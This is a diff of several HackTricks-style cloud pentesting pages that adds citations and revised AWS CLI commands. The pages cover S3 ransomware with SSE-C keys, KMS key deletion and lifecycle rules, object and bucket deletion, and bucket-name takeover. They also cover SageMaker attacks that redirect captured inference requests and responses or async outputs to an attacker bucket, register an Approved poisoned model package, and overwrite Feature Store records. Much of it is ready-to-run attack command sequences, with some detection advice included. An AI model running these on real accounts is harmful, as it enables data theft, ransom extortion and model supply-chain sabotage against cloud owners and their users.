-To add further pressure, the attacker schedules the deletion of the KMS key used in the attack. This gives the target a 7-day window to recover their data before the key is deleted and the data becomes permanently lost.
+To add further pressure, the attacker schedules the deletion of the KMS key used in the attack. AWS KMS requires a configurable **7–30-day waiting period** (30 days by default); after deletion, data encrypted under that key cannot be decrypted and is unrecoverable.<sup>[[2]](#references)</sup>
 
-Finally, the attacker could upload a final file, usually named "ransom-note.txt," which contains instructions for the target on how to retrieve their files. This file is uploaded without encryption, likely to catch the target's attention and make them aware of the ransomware attack.
+Finally, the attacker could upload a final file, usually named "ransom-note.txt," which contains instructions for the target on how to retrieve their files. This file is uploaded without encryption, likely to catch the target's attention and make them aware of the ransomware attack.<sup>[[1]](#references)</sup>
 
 #### SSE-C (Customer-Provided Key) Ransomware (Codefinger-like)
 
-Another variant is abusing **SSE-C** (S3 server-side encryption with **customer-provided keys**). With SSE-C, the **client provides the encryption key on every request** and **AWS does not store the key**. This means that if an attacker rewrites objects using **their own SSE-C key**, the victim's data becomes unreadable unless the victim can provide that attacker-controlled key.
+Another variant is abusing **SSE-C** (S3 server-side encryption with **customer-provided keys**). With SSE-C, the **client provides the encryption key on every request** and **AWS does not store the key**. This means that if an attacker rewrites objects using **their own SSE-C key**, the victim's data becomes unreadable unless the victim can provide that attacker-controlled key.<sup>[[4]](#references)[[5]](#references)</sup>
 
-- **Preconditions:** Compromised AWS credentials (or any principal with the right permissions) and the ability to **rewrite objects** (e.g., `s3:PutObject` on the target keys/prefixes). This is often paired with the ability to set destructive lifecycle policies (see below), e.g. `s3:PutLifecycleConfiguration`.
+On current general-purpose buckets, SSE-C must be enabled for writes: new buckets block it by default, and S3 rejects SSE-C writes while that block is active.<sup>[[4]](#references)[[5]](#references)</sup>
+
+- **Preconditions:** Compromised AWS credentials (or any principal with the right permissions) and the ability to **rewrite objects** (e.g., `s3:PutObject` on the target keys/prefixes). This is often paired with the ability to set destructive lifecycle policies (see below), e.g. `s3:PutLifecycleConfiguration`.<sup>[[5]](#references)[[7]](#references)</sup>
 - **Attack chain:**
-  1. Attacker generates a random 256-bit key (AES-256) and keeps it.
-  2. Attacker **rewrites** existing objects (same object keys) using SSE-C headers so the stored object is now encrypted with the attacker key.
-  3. Victim cannot download/decrypt without providing the SSE-C key (even if IAM permissions are fine).
-  4. Attacker can delete the key (or simply never provide it) to make data unrecoverable.
+  1. Attacker chooses and retains a 256-bit AES key.<sup>[[5]](#references)</sup>
+  2. Attacker **rewrites** existing objects (same object keys) using SSE-C headers so the stored object is now encrypted with the attacker key.<sup>[[5]](#references)</sup>
+  3. Victim cannot download/decrypt without providing the SSE-C key (even if IAM permissions are fine).<sup>[[4]](#references)[[5]](#references)</sup>
+  4. Attacker can delete the key (or simply never provide it) to make data unrecoverable.<sup>[[4]](#references)[[5]](#references)</sup>
 
 Example (conceptual) CLI usage:
+
+The AWS CLI expects raw key material for `--sse-c-key`; it handles the request encoding, so the value below is not base64-encoded.<sup>[[6]](#references)</sup>
 
 ```bash
 # Upload/overwrite an object encrypted with attacker-provided SSE-C key
 aws s3 cp ./file s3://<BUCKET>/<KEY> \
   --sse-c AES256 \
-  --sse-c-key <BASE64_32_BYTES>
+  --sse-c-key <32_BYTE_KEY>
 
 # Download requires providing the same key again
 aws s3 cp s3://<BUCKET>/<KEY> ./file \
   --sse-c AES256 \
-  --sse-c-key <BASE64_32_BYTES>
+  --sse-c-key <32_BYTE_KEY>
 ```
 
 ##### Adding Pressure: Lifecycle "Timer" Abuse
 
-To remove recovery options (like old versions), attackers can pair SSE-C rewrites with **lifecycle rules** that expire objects and/or delete noncurrent versions after a short period:
+To remove recovery options (like old versions), attackers can pair SSE-C rewrites with **lifecycle rules** that expire objects and/or delete noncurrent versions after a short period.<sup>[[7]](#references)</sup>
 
-- `s3:PutLifecycleConfiguration` on the bucket lets an attacker schedule deletions without issuing explicit delete operations for every object/version.
-- This is especially impactful when **versioning is enabled**, because it can remove the "previous good version" that would otherwise allow recovery.
+- `s3:PutLifecycleConfiguration` on the bucket lets an attacker schedule deletions without issuing explicit delete operations for every object/version.<sup>[[7]](#references)</sup>
+- This is especially impactful when **versioning is enabled**, because it can remove the "previous good version" that would otherwise allow recovery.<sup>[[7]](#references)[[21]](#references)</sup>
 
 ##### Detection & Mitigations
 
-- Prefer **SSE-KMS** (or SSE-S3) over SSE-C unless you have a strong operational reason to allow SSE-C.
-- Monitor/alert on `PutObject` requests using SSE-C headers (CloudTrail data events for S3).
-- Monitor/alert on unexpected `PutBucketLifecycleConfiguration` (lifecycle changes).
+- Prefer **SSE-KMS** (or SSE-S3) over SSE-C unless you have a strong operational reason to allow SSE-C.<sup>[[4]](#references)</sup>
+- Monitor/alert on unusual S3 object-level data events, including `PutObject` and `CopyObject` activity, and on SSE-C usage where your telemetry exposes it.<sup>[[8]](#references)</sup>
+- Monitor/alert on unexpected `PutBucketLifecycleConfiguration` (lifecycle changes).<sup>[[7]](#references)[[8]](#references)</sup>
 - Monitor/alert on sudden spikes in overwrite activity (same keys updated rapidly) and delete-marker/version deletions.
-- Restrict high-risk permissions: Limit `s3:PutObject` to necessary prefixes; strongly restrict `s3:PutLifecycleConfiguration` and `s3:PutBucketVersioning`; consider requiring MFA for sensitive admin actions (where applicable) and use separate admin roles with approvals.
-- Recovery posture: Use **versioning**, **backups**, and immutable/offline copies (S3 replication to protected account, backup vaults, etc.); protect noncurrent versions from aggressive deletion and guard lifecycle changes with SCPs / guardrails.
+- Restrict high-risk permissions: Limit `s3:PutObject` to necessary prefixes; strongly restrict `s3:PutLifecycleConfiguration` and `s3:PutBucketVersioning`; consider requiring MFA for sensitive admin actions (where applicable) and use separate admin roles with approvals.<sup>[[3]](#references)[[7]](#references)</sup>
+- Recovery posture: Use **versioning**, **backups**, and immutable/offline copies (S3 replication to protected account, backup vaults, etc.); protect noncurrent versions from aggressive deletion and guard lifecycle changes with SCPs / guardrails.<sup>[[7]](#references)[[14]](#references)[[21]](#references)</sup>
 
 ### `s3:RestoreObject`
 
-An attacker with the s3:RestoreObject permission can reactivate objects archived in Glacier or Deep Archive, making them temporarily accessible. This enables recovery and exfiltration of historically archived data (backups, snapshots, logs, certifications, old secrets) that would normally be out of reach. If the attacker combines this permission with read permissions (e.g., s3:GetObject), they can obtain full copies of sensitive data.
+An attacker with the `s3:RestoreObject` permission can reactivate objects archived in S3 Glacier Flexible Retrieval or S3 Glacier Deep Archive, making a temporary copy accessible. This enables recovery and exfiltration of historically archived data (backups, snapshots, logs, certifications, old secrets) that would normally be out of reach. If the attacker combines this permission with read permissions (e.g., `s3:GetObject`), they can obtain full copies of sensitive data.<sup>[[9]](#references)</sup>
+
+The following AWS CLI command initiates a restore request for the specified number of days.<sup>[[9]](#references)[[10]](#references)</sup>
 
 ```bash
 aws s3api restore-object \
@@ -90,7 +94,7 @@ aws s3api restore-object \
 
 ### `s3:Delete*`
 
-An attacker with the s3:Delete* permission can delete objects, versions, and entire buckets, disrupt backups, and cause immediate and irreversible data loss, destruction of evidence, and compromise of backup or recovery artifacts.
+Relevant S3 delete permissions include `s3:DeleteObject`, `s3:DeleteObjectVersion`, and `s3:DeleteBucket`. These permissions can disrupt backups and cause data loss, destruction of evidence, or compromise of backup and recovery artifacts.<sup>[[11]](#references)[[12]](#references)</sup>
 
 ```bash
 # Delete an object from a bucket
@@ -109,11 +113,15 @@ aws s3api delete-bucket \
   --bucket <BUCKET_NAME>
 ```
 
+For versioned buckets, `aws s3 rm --recursive` alone does not remove every object version and delete marker, so all versions must be deleted before `delete-bucket` can succeed.<sup>[[11]](#references)[[12]](#references)</sup>
+
 ### Global bucket name takeover of autonomous writers - `s3:DeleteBucket`
 
-S3 bucket names are globally unique. If a victim account has automated writers that keep delivering data to `arn:aws:s3:::<bucket-name>` and an attacker can empty/delete that bucket, the attacker may recreate the same bucket name in an attacker-controlled account and receive future deliveries without changing the upstream service configuration.
+General purpose S3 bucket names are unique across the shared global namespace within an AWS partition. If a victim account has automated writers that keep delivering data to `arn:aws:s3:::<bucket-name>` and an attacker can empty/delete that bucket, the attacker may recreate the same bucket name in an attacker-controlled account and receive future deliveries without changing the upstream service configuration.<sup>[[23]](#references)[[13]](#references)</sup>
 
-Good targets to review include S3 replication destinations, Kinesis Data Firehose delivery streams, CloudWatch Logs/SNS/WAF delivery chains that land in S3, and custom backup or export jobs.
+Good targets to review include S3 replication destinations and Kinesis Data Firehose delivery streams.<sup>[[23]](#references)[[14]](#references)[[15]](#references)</sup> Also inspect CloudWatch Logs/SNS/WAF delivery chains that land in S3, and custom backup or export jobs.
+
+The following commands show how to inspect destinations, empty/delete a permitted bucket, and recreate the name.<sup>[[16]](#references)[[17]](#references)[[18]](#references)[[19]](#references)[[20]](#references)</sup>
 
 ```bash
 # Review S3 replication destinations on source buckets
@@ -131,14 +139,40 @@ aws s3api delete-bucket --bucket <BUCKET_NAME>
 aws s3 mb s3://<BUCKET_NAME> --region <REGION>
 ```
 
-The replacement bucket policy must allow the upstream writer to put objects. The exact principal depends on the service: for example an IAM replication role, a Firehose delivery role, or a service principal constrained with `aws:SourceArn` / `aws:SourceAccount`.
+The replacement bucket policy must allow the upstream writer to put objects. The exact principal depends on the service: for example an IAM replication role, a Firehose delivery role, or a service principal constrained with `aws:SourceArn` / `aws:SourceAccount`.<sup>[[14]](#references)[[15]](#references)[[22]](#references)</sup>
 
-**Potential Impact:** silent exfiltration of future replicated objects, logs, telemetry, backups, and pipeline artifacts to an attacker-controlled AWS account.
+**Potential Impact:** silent exfiltration of future replicated objects, logs, telemetry, backups, and pipeline artifacts to an attacker-controlled AWS account.<sup>[[23]](#references)[[13]](#references)[[14]](#references)[[15]](#references)</sup>
 
-**Detection & Mitigation:** alert on deletion of buckets referenced by replication rules or delivery streams, monitor for `NoSuchBucket` delivery failures followed by bucket recreation, restrict `s3:DeleteBucket` on export destinations, and pin cross-account deliveries with strict bucket policies and ownership expectations.
+**Detection & Mitigation:** alert on deletion of buckets referenced by replication rules or delivery streams, monitor for `NoSuchBucket` delivery failures followed by bucket recreation, restrict `s3:DeleteBucket` on export destinations, and pin cross-account deliveries with strict bucket policies and ownership expectations.<sup>[[23]](#references)</sup>
 
 
 
-**For more info** [**check the original research**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**.**
+**For more info** [**check the original research**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/).<sup>[[1]](#references)</sup>
+
+## References
+
+- [1] [S3 Ransomware Part 1: Attack Vector](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)
+- [2] [Delete an AWS KMS key](https://docs.aws.amazon.com/kms/latest/developerguide/deleting-keys.html)
+- [3] [Configuring MFA delete](https://docs.aws.amazon.com/AmazonS3/latest/userguide/MultiFactorAuthenticationDelete.html)
+- [4] [Using server-side encryption with customer-provided keys (SSE-C)](https://docs.aws.amazon.com/AmazonS3/latest/userguide/ServerSideEncryptionCustomerKeys.html)
+- [5] [Specifying server-side encryption with customer-provided keys (SSE-C)](https://docs.aws.amazon.com/AmazonS3/latest/userguide/specifying-s3-c-encryption.html)
+- [6] [cp — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/s3/cp.html)
+- [7] [PutBucketLifecycleConfiguration](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLifecycleConfiguration.html)
+- [8] [Enabling CloudTrail event logging for S3 buckets and objects](https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-cloudtrail-logging-for-s3.html)
+- [9] [RestoreObject](https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html)
+- [10] [restore-object — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/s3api/restore-object.html)
+- [11] [DeleteObject](https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteObject.html)
+- [12] [DeleteBucket](https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucket.html)
+- [13] [General purpose bucket naming rules](https://docs.aws.amazon.com/AmazonS3/latest/userguide/bucketnamingrules.html)
+- [14] [What does Amazon S3 replicate?](https://docs.aws.amazon.com/AmazonS3/latest/userguide/replication-what-is-isnot-replicated.html)
+- [15] [Understand data delivery in Amazon Data Firehose](https://docs.aws.amazon.com/firehose/latest/dev/basic-deliver.html)
+- [16] [get-bucket-replication — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-replication.html)
+- [17] [describe-delivery-stream — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/firehose/describe-delivery-stream.html)
+- [18] [rm — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/s3/rm.html)
+- [19] [delete-bucket — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/s3api/delete-bucket.html)
+- [20] [mb — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/s3/mb.html)
+- [21] [How S3 Versioning works](https://docs.aws.amazon.com/AmazonS3/latest/userguide/versioning-workflows.html)
+- [22] [Controlling access with Amazon Data Firehose](https://docs.aws.amazon.com/firehose/latest/dev/controlling-access.html)
+- [23] [The Global Namespace Risk: Universal Bucket Hijacking Technique for Cloud Data Exfiltration](https://unit42.paloaltonetworks.com/cloud-bucket-hijacking-risks/)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/README.md
@@ -1,15 +1,15 @@
 # AWS - SageMaker Post-Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## SageMaker endpoint data siphon via UpdateEndpoint DataCaptureConfig
 
-Abuse SageMaker endpoint management to enable full request/response capture to an attacker‑controlled S3 bucket without touching the model or container. Uses a zero/low‑downtime rolling update and only requires endpoint management permissions.
+Abuse SageMaker endpoint management to enable input and output capture to an attacker‑controlled S3 bucket without changing the model or container. `DataCaptureConfig` supports selecting input/output boundaries, sampling requests, and storing the capture at an S3 destination; `UpdateEndpoint` deploys the new endpoint configuration with no availability loss by default.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
+
+The endpoint's existing SageMaker execution role must have write access, and any destination bucket policy must also permit it; creating a bucket alone does not grant that access.<sup>[[4]](#references)</sup>
 
 ### Requirements
-- IAM: `sagemaker:DescribeEndpoint`, `sagemaker:DescribeEndpointConfig`, `sagemaker:CreateEndpointConfig`, `sagemaker:UpdateEndpoint`
-- S3: `s3:CreateBucket` (or use an existing bucket in the same account)
-- Optional (if using SSE‑KMS): `kms:Encrypt` on the chosen CMK
+- IAM: `sagemaker:ListEndpoints`, `sagemaker:DescribeEndpoint`, `sagemaker:DescribeEndpointConfig`, `sagemaker:CreateEndpointConfig`, `sagemaker:UpdateEndpoint`; add `sagemaker:InvokeEndpoint` if generating test traffic
+- S3: Ability for the endpoint's execution role to write (`s3:PutObject`) to the destination; the caller also needs `s3:CreateBucket` when creating a bucket and `s3:ListBucket` to inspect it.<sup>[[4]](#references)</sup>
+- Optional (if using SSE‑KMS): KMS permissions for the endpoint's writer on the chosen CMK
 - Target: An existing InService real‑time endpoint in the same account/region
 
 ### Steps
@@ -24,7 +24,7 @@ echo "EndpointConfig=$CFG"
 aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name "$CFG" --query ProductionVariants > /tmp/pv.json
 ```
 
-2) Prepare attacker S3 destination for captures
+2) Prepare an S3 destination that the endpoint's execution role can write to
 
 ```bash
 ACC=$(aws sts get-caller-identity --query Account --output text)
@@ -32,7 +32,7 @@ BUCKET=ht-sm-capture-$ACC-$(date +%s)
 aws s3 mb s3://$BUCKET --region $REGION
 ```
 
-3) Create a new EndpointConfig that keeps the same variants but enables DataCapture to the attacker bucket
+3) Create a new EndpointConfig that keeps the same variants but enables DataCapture to the attacker bucket. The two capture modes collect both request and response records.<sup>[[1]](#references)</sup> This compact example copies only `ProductionVariants`; preserve any other compatible settings from the original endpoint configuration (for example KMS, shadow-variant, or explainer settings) when they are required.
 
 Note: Use explicit content types that satisfy CLI validation.
 
@@ -60,7 +60,7 @@ aws sagemaker create-endpoint-config \
   --data-capture-config file:///tmp/dc.json
 ```
 
-4) Apply the new config with a rolling update (minimal/no downtime)
+4) Apply the new config with SageMaker's default blue/green update (minimal/no downtime)<sup>[[3]](#references)</sup>
 
 ```bash
 aws sagemaker update-endpoint --region $REGION --endpoint-name "$EP" --endpoint-config-name "$NEWCFG"
@@ -83,17 +83,19 @@ aws s3 ls s3://$BUCKET/capture/ --recursive --human-readable --summarize
 ```
 
 ### Impact
-- Full exfiltration of real‑time inference request and response payloads (and metadata) from the targeted endpoint to an attacker‑controlled S3 bucket.
-- No changes to the model/container image and only endpoint‑level changes, enabling a stealthy data theft path with minimal operational disruption.
+- Full exfiltration of real‑time inference request and response payloads from the targeted endpoint to an attacker‑controlled S3 bucket when the endpoint role can write there.<sup>[[1]](#references)[[4]](#references)</sup>
+- No changes to the model/container image and only endpoint‑level changes, enabling a stealthy data theft path with minimal operational disruption.<sup>[[2]](#references)[[3]](#references)</sup>
 
 
 ## SageMaker async inference output hijack via UpdateEndpoint AsyncInferenceConfig
 
-Abuse endpoint management to redirect asynchronous inference outputs to an attacker-controlled S3 bucket by cloning the current EndpointConfig and setting AsyncInferenceConfig.OutputConfig S3OutputPath/S3FailurePath. This exfiltrates model predictions (and any transformed inputs included by the container) without modifying the model/container.
+Abuse endpoint management to redirect asynchronous inference outputs to an attacker-controlled S3 bucket by cloning the current EndpointConfig and setting `AsyncInferenceConfig.OutputConfig.S3OutputPath`/`S3FailurePath`. SageMaker queues asynchronous requests and writes successful or failed inference responses to the configured S3 locations, so this can exfiltrate predictions and any transformed data that the container includes in its response without modifying the model/container.<sup>[[2]](#references)[[5]](#references)</sup>
+
+Adding `AsyncInferenceConfig` makes the endpoint asynchronous-only, so changing an existing synchronous endpoint can disrupt clients that still call `InvokeEndpoint` even though the fleet update itself avoids availability loss.<sup>[[3]](#references)[[5]](#references)</sup>
 
 ### Requirements
-- IAM: `sagemaker:DescribeEndpoint`, `sagemaker:DescribeEndpointConfig`, `sagemaker:CreateEndpointConfig`, `sagemaker:UpdateEndpoint`
-- S3: Ability to write to the attacker S3 bucket (via the model execution role or a permissive bucket policy)
+- IAM: `sagemaker:DescribeEndpoint`, `sagemaker:DescribeEndpointConfig`, `sagemaker:CreateEndpointConfig`, `sagemaker:UpdateEndpoint`, and `sagemaker:InvokeEndpointAsync`
+- S3: The endpoint's execution role must read the input object and write successful and failed responses to the attacker bucket (via IAM and/or a bucket policy); the caller needs `s3:PutObject` to upload the test object and `s3:ListBucket` to inspect outputs.<sup>[[4]](#references)[[5]](#references)</sup>
 - Target: An InService endpoint where asynchronous invocations are (or will be) used
 
 ### Steps
@@ -106,7 +108,7 @@ CUR_CFG=$(aws sagemaker describe-endpoint --region $REGION --endpoint-name "$EP"
 aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name "$CUR_CFG" --query ProductionVariants > /tmp/pv.json
 ```
 
-2) Create an attacker bucket (ensure the model execution role can PutObject to it)
+2) Create an attacker bucket (ensure the model execution role can read the input and write the outputs)
 
 ```bash
 ACC=$(aws sts get-caller-identity --query Account --output text)
@@ -114,7 +116,7 @@ BUCKET=ht-sm-async-exfil-$ACC-$(date +%s)
 aws s3 mb s3://$BUCKET --region $REGION || true
 ```
 
-3) Clone EndpointConfig and hijack AsyncInference outputs to the attacker bucket
+3) Clone EndpointConfig and hijack AsyncInference outputs to the attacker bucket. `S3OutputPath` receives successful responses and `S3FailurePath` receives failed responses.<sup>[[2]](#references)</sup> The command below copies only `ProductionVariants`; preserve other compatible settings from the original configuration, and ensure the target satisfies the asynchronous-inference endpoint constraints.
 
 ```bash
 NEWCFG=${CUR_CFG}-async-exfil
@@ -137,18 +139,19 @@ aws s3 ls s3://$BUCKET/async-fail/ --recursive || true
 ```
 
 ### Impact
-- Redirects asynchronous inference results (and error bodies) to attacker-controlled S3, enabling covert exfiltration of predictions and potentially sensitive pre/post-processed inputs produced by the container, without changing model code or image and with minimal/no downtime.
+- Redirects asynchronous inference results and failure responses to attacker-controlled S3, enabling covert exfiltration of predictions and potentially sensitive pre/post-processed inputs produced by the container, without changing model code or image. The endpoint fleet update can avoid availability loss, but adding async configuration may disrupt existing synchronous callers.<sup>[[3]](#references)[[4]](#references)[[5]](#references)</sup>
 
 
 ## SageMaker Model Registry supply-chain injection via CreateModelPackage(Approved)
 
-If an attacker can CreateModelPackage on a target SageMaker Model Package Group, they can register a new model version that points to an attacker-controlled container image and immediately mark it Approved. Many CI/CD pipelines auto-deploy Approved model versions to endpoints or training jobs, resulting in attacker code execution under the service’s execution roles. Cross-account exposure can be amplified by a permissive ModelPackageGroup resource policy.
+If an attacker can call `CreateModelPackage` on a target SageMaker Model Package Group, they can register a model version whose inference specification names an ECR container image and S3 model artifacts, then set its approval status to `Approved`; AWS documents `Approved` as the status required for deploying a versioned package.<sup>[[6]](#references)[[7]](#references)</sup> Many CI/CD pipelines auto-deploy Approved model versions to endpoints or training jobs, resulting in attacker code execution under the service's execution roles. Cross-account exposure can be amplified when a Model Package Group is shared through a permissive resource policy.<sup>[[8]](#references)[[9]](#references)</sup>
 
 ### Requirements
 - IAM (minimum to poison an existing group): `sagemaker:CreateModelPackage` on the target ModelPackageGroup
 - Optional (to create a group if one doesn’t exist): `sagemaker:CreateModelPackageGroup`
-- S3: Read access to referenced ModelDataUrl (or host attacker-controlled artifacts)
+- S3: Ability to place model artifacts where SageMaker and downstream deployment can read the referenced `ModelDataUrl`
 - Target: A Model Package Group that downstream automation watches for Approved versions
+- Cross-account variant: The group owner must share the Model Package Group and grant a resource policy that permits the caller; adding that policy uses `sagemaker:PutModelPackageGroupPolicy`.<sup>[[8]](#references)[[9]](#references)</sup>
 
 ### Steps
 1) Set region and create/find a target Model Package Group
@@ -158,16 +161,18 @@ MPG=victim-group-$(date +%s)
 aws sagemaker create-model-package-group --region $REGION --model-package-group-name $MPG --model-package-group-description "test group"
 ```
 
-2) Prepare dummy model data in S3
+2) Prepare a harmless gzip tar archive in S3.<sup>[[6]](#references)[[7]](#references)</sup>
 ```bash
 ACC=$(aws sts get-caller-identity --query Account --output text)
 BUCKET=ht-sm-mpkg-$ACC-$(date +%s)
 aws s3 mb s3://$BUCKET --region $REGION
-head -c 1024 </dev/urandom > /tmp/model.tar.gz
+mkdir -p /tmp/ht-sm-model
+printf 'placeholder\n' > /tmp/ht-sm-model/model.txt
+tar -czf /tmp/model.tar.gz -C /tmp/ht-sm-model model.txt
 aws s3 cp /tmp/model.tar.gz s3://$BUCKET/model/model.tar.gz --region $REGION
 ```
 
-3) Register a malicious (here benign) Approved model package version referencing a public AWS DLC image
+3) Register an Approved model package version. The sample uses a public AWS DLC image; use an image you control only in an authorized lab.<sup>[[6]](#references)[[7]](#references)</sup>
 ```bash
 IMG="683313688378.dkr.ecr.$REGION.amazonaws.com/sagemaker-scikit-learn:1.2-1-cpu-py3"
 cat > /tmp/inf.json << JSON
@@ -185,20 +190,34 @@ JSON
 aws sagemaker create-model-package --region $REGION   --model-package-group-name $MPG   --model-approval-status Approved   --inference-specification file:///tmp/inf.json
 ```
 
-4) Verify the new Approved version exists
+4) Verify the new Approved version exists<sup>[[7]](#references)</sup>
 ```bash
 aws sagemaker list-model-packages --region $REGION --model-package-group-name $MPG --output table
 ```
 
 ### Impact
-- Poison the Model Registry with an Approved version that references attacker-controlled code. Pipelines that auto-deploy Approved models may pull and run the attacker image, yielding code execution under endpoint/training roles.
-- With a permissive ModelPackageGroup resource policy (PutModelPackageGroupPolicy), this abuse can be triggered cross-account.
+- Poison the Model Registry with an Approved version that references attacker-controlled code. Pipelines that auto-deploy Approved models may pull and run the attacker image, yielding code execution under endpoint/training roles.<sup>[[6]](#references)[[7]](#references)</sup>
+- With a permissive ModelPackageGroup resource policy, this abuse can be triggered cross-account when the group is shared with the attacker's account.<sup>[[8]](#references)[[9]](#references)</sup>
 
 ## Feature store poisoning
 
-Abuse `sagemaker:PutRecord` on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with `sagemaker:GetRecord`, an attacker can read sensitive features. This does not require access to models or endpoints.
+Abuse `sagemaker:PutRecord` on a Feature Group with OnlineStore enabled and a newer event time to overwrite the latest feature values consumed by online inference. Combined with `sagemaker:GetRecord`, an attacker can read those online records. This does not require access to models or endpoints.<sup>[[10]](#references)</sup>
 
 {{#ref}}
 feature-store-poisoning.md
-{{/ref}}
+{{#endref}}
+
+## References
+
+- [1] [DataCaptureConfig - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_DataCaptureConfig.html)
+- [2] [CreateEndpointConfig - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_CreateEndpointConfig.html)
+- [3] [update-endpoint - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sagemaker/update-endpoint.html)
+- [4] [How to use SageMaker AI execution roles](https://docs.aws.amazon.com/sagemaker/latest/dg/sagemaker-roles.html)
+- [5] [Asynchronous inference - Amazon SageMaker AI](https://docs.aws.amazon.com/sagemaker/latest/dg/async-inference.html)
+- [6] [CreateModelPackage - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_CreateModelPackage.html)
+- [7] [create-model-package - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sagemaker/create-model-package.html)
+- [8] [Cross-account discoverability - Amazon SageMaker AI](https://docs.aws.amazon.com/sagemaker/latest/dg/model-registry-ram.html)
+- [9] [PutModelPackageGroupPolicy - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_PutModelPackageGroupPolicy.html)
+- [10] [Feature Store concepts - Amazon SageMaker AI](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store-concepts.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md
@@ -1,38 +1,54 @@
 # SageMaker Feature Store online store poisoning
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
-Abuse `sagemaker:PutRecord` on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with `sagemaker:GetRecord`, an attacker can read sensitive features. This does not require access to models or endpoints.
+An identity authorized for `sagemaker:PutRecord` can submit a full record to an online-enabled Feature Group. If its event time is newer, the record becomes the latest value in the low-latency OnlineStore used by real-time inference; an identity authorized for `sagemaker:GetRecord` can read the latest record as well. This data-plane path targets feature values directly and does not require permissions to modify a model or endpoint.<sup>[[1]](#references)[[2]](#references)[[5]](#references)[[6]](#references)[[8]](#references)</sup>
 
 ## Requirements
-- Permissions: `sagemaker:ListFeatureGroups`, `sagemaker:DescribeFeatureGroup`, `sagemaker:PutRecord`, `sagemaker:GetRecord`
-- Target: Feature Group with OnlineStore enabled (typically backing real-time inference)
+
+- Permissions: `sagemaker:ListFeatureGroups`, `sagemaker:DescribeFeatureGroup`, `sagemaker:PutRecord`, `sagemaker:GetRecord`.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup>
+- Target: Feature Group with `OnlineStoreConfig.EnableOnlineStore` set to `true` (typically backing real-time inference).<sup>[[1]](#references)[[4]](#references)</sup>
+- If the OnlineStore uses a customer managed KMS key, the data-plane caller also needs `kms:Decrypt` on that key.<sup>[[2]](#references)</sup>
 - Complexity: **LOW** - Simple AWS CLI commands, no model manipulation required
 
 ## Steps
 
 ### Reconnaissance
 
-1) List Feature Groups with OnlineStore enabled
+1) List Feature Groups with OnlineStore enabled. `ListFeatureGroups` returns summaries without `OnlineStoreConfig`, so enumerate the names and inspect each group with `DescribeFeatureGroup`.<sup>[[3]](#references)[[4]](#references)</sup>
+
+The CLI automatically paginates this `list-feature-groups` call; the query below extracts the `FeatureGroupSummaries` names from every page.<sup>[[9]](#references)</sup>
 ```bash
 REGION=${REGION:-us-east-1}
-aws sagemaker list-feature-groups \
-  --region $REGION \
-  --query "FeatureGroupSummaries[?OnlineStoreConfig!=null].[FeatureGroupName,CreationTime]" \
-  --output table
+while IFS= read -r FG; do
+  [ -n "$FG" ] && [ "$FG" != "None" ] || continue
+  read -r ENABLED CREATED < <(aws sagemaker describe-feature-group \
+    --region "$REGION" \
+    --feature-group-name "$FG" \
+    --query '[OnlineStoreConfig.EnableOnlineStore,CreationTime]' \
+    --output text)
+  if [ "$ENABLED" = "True" ]; then
+    printf '%s\t%s\n' "$FG" "$CREATED"
+  fi
+done < <(
+  aws sagemaker list-feature-groups \
+    --region "$REGION" \
+    --query 'FeatureGroupSummaries[].FeatureGroupName' \
+    --output text | tr '\t' '\n'
+)
 ```
 
 2) Describe a target Feature Group to understand its schema
 ```bash
-FG=<feature-group-name>
+FG="<feature-group-name>"
 aws sagemaker describe-feature-group \
   --region $REGION \
   --feature-group-name "$FG"
 ```
 
-Note the `RecordIdentifierFeatureName`, `EventTimeFeatureName`, and all feature definitions. These are required for crafting valid records.
+Note the `RecordIdentifierFeatureName`, `EventTimeFeatureName`, and all feature definitions. These identify records, require an event time, and define the names and types accepted by `PutRecord`.<sup>[[4]](#references)[[7]](#references)[[8]](#references)</sup> Replace `entity_id` and `event_time` in the examples with the names returned by `DescribeFeatureGroup`; the examples assume that the event-time feature is a `String` containing an ISO-8601 timestamp. A `Fractional` event-time feature instead requires Unix seconds.<sup>[[4]](#references)[[12]](#references)</sup>
 
 ### Attack Scenario 1: Data Poisoning (Overwrite Existing Records)
+
